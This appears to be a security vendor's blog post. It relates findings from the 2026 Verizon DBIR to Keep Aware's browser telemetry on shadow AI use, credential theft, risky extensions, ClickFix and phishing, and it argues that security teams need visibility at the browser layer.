The annual **Verizon Data Breach Investigations Report (DBIR)** serves as a vital benchmark for the cybersecurity industry, offering insights derived from a multitude of independent data sources. This year, the 2026 **DBIR** signals a significant structural shift in attacker methodologies, emphasizing the growing importance of browser-layer visibility. As a contributor to the 2026 **DBIR**, the **Keep Aware** team gained early insight into these converging signals. Their browser telemetry aligns with the **DBIR** data, further revealing critical areas where traditional network and endpoint tools fall short. ### Shadow AI: A Mainstream Enterprise Risk **Shadow AI** has emerged as a major concern, identified in the **Verizon DBIR** as the third most common non-malicious insider action observed in Data Loss Prevention (DLP) datasets. This represents a fourfold increase from the previous year. Employees are increasingly using personal AI services like **ChatGPT** to expedite tasks, often pasting internal documents or source code into unauthorized sessions before corporate-approved alternatives are available. The scale of this unauthorized AI usage is staggering: 67% of users access AI services on corporate devices via personal, non-corporate accounts. Furthermore, 45% of employees are now regular AI users. **Keep Aware's** browser telemetry adds a crucial layer of detail, showing that over half of AI prompt inputs are sent to personal accounts. A significant 23% of sensitive prompt uploads involve data transiting through personal or unverified accounts, effectively bypassing corporate DLP policies and logging infrastructure.  ### Credential Abuse and the Browser's Detection Gap The 2026 **DBIR** found that 39% of breaches involved credential abuse. **Keep Aware's** 2025 attack data corroborates this, identifying browser-based credential theft as the leading browser-based attack, accounting for approximately 41% of observed threat activity. This suggests that credential theft originating in the browser often precedes successful breaches. A critical finding is the invisibility of these attacks to traditional security tools. **Keep Aware's** analysis revealed that 63% of **Microsoft**-themed phishing sites were not flagged by any **VirusTotal** vendor at the time of employee exposure. More alarmingly, 100% of observed credential theft attempts bypassed existing non-browser security controls, including network proxies, DNS filters, and endpoint agents. Detection, it appears, is reliably possible only within the browser itself, where the page is rendered and user interaction occurs. ### Browser Extensions: Privileged, Ungoverned, and Expanding Threat Browser extensions operate with a high level of privilege, capable of reading, modifying, and exfiltrating data from within the browser context. Despite this, the 2026 **DBIR** flagged that the average enterprise has over 15% of users with unauthorized AI extensions installed. The problem extends beyond AI tools. **Keep Aware's** telemetry shows that 13% of unique browser extensions across their customer base were classified as high or critical risk. A particularly concerning insight is that 93% of these poor-reputation extensions were labeled as "productivity" tools by browser marketplaces. This common categorization renders category-based allowlisting policies functionally useless for this threat class. ### ClickFix and Browser-Native Social Engineering Both the 2026 **DBIR** and **Keep Aware's** State of Browser Security Report highlight **ClickFix** as an emerging social engineering technique. The **Verizon DBIR** noted **ClickFix** accounted for 2.7% of browser-detected attacks, a small but significant indicator of evolving browser-based social engineering.  **ClickFix** is a deceptive tactic designed to trick users into unknowingly executing malicious code from the browser onto their host machine. These attacks often originate from compromised websites or even malicious LLM chat responses. While the endpoint ultimately bears the impact, the browser serves as the initial social engineering medium and, crucially, the first line of defense. ### The Human Element: A Browser-Centric Problem The 2026 **DBIR** found that 62% of breaches involved the human element, with phishing initiating 16% of incidents. **Keep Aware's** data further emphasizes this, showing phishing and social engineering responsible for 46% of browser attacks in 2025. While often framed as a training and awareness issue, attackers are constantly refining browser-based social engineering. Tactics include phishing links to benign intermediary sites, complex redirect chains, pages that render differently for automated scanners, content hosted on legitimate websites, and silent clipboard injections. Browser-level visibility doesn't eliminate the human element but shifts detection to the point of interaction, identifying threats before they are exploited downstream. ### Implications for Security Teams **Shadow AI**, credential theft, malicious extensions, and browser-native social engineering techniques like **ClickFix** share a common thread: they all execute within the browser and produce artifacts most, if not only, visible at the browser layer. Security programs relying solely on network, endpoint, and identity telemetry will continue to harbor significant blind spots precisely where attackers are increasingly operating. The browser is no longer merely an application; for most enterprise users, it is the primary work environment. Securing it is no longer an option but a necessity. Understanding this gap is crucial before attackers exploit it.